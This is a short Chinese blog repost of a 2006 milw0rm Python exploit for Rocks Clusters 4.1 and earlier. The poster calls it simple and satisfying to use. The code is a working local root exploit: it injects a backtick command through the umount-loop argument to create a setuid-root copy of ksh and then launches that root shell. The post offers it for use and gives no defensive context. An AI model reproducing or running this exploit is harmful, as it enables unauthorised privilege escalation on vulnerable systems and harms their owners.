估计现在已经没多大用了。2006年的漏洞,不过还是在某视频网站上看到了这个,用起来很爽,也很简单。 |
############################################################################## |
##
rocksumountdirty.py: Rocks release <=4.1 local root exploit |
##
quick and nasty version of the exploit. make sure the . is writable and |
##
you clean up afterwards. ;) |
## |
##
coded by: xavier@tigerteam.se [http://xavsec.blogspot.com] |
############################################################################## |
x=__import__('os');c=x.getcwd() |
open('%s/x'%c, 'a').write("#!/bin/sh\ncp
/bin/ksh %s/shell\nchmod a+xs %s/shell\nchown root.root %s/shell\n" % (c,c,c)) |
print "Rocks
Clusters <=4.1 umount-loop local root exploit by xavier@tigerteam.se [http://xavsec.blogspot.com]" |
x.system('umount-loop
"\`sh %s/x\`"'%c);x.system("%s/shell"%c) |
#
milw0rm.com [2006-07-15] |
本文介绍了一个针对 Rocks 4.1 版本的 umount 漏洞本地提权攻击代码。该漏洞利用简单有效,通过修改文件权限并执行特定命令来获得 root 权限。

被折叠的 条评论
为什么被折叠?



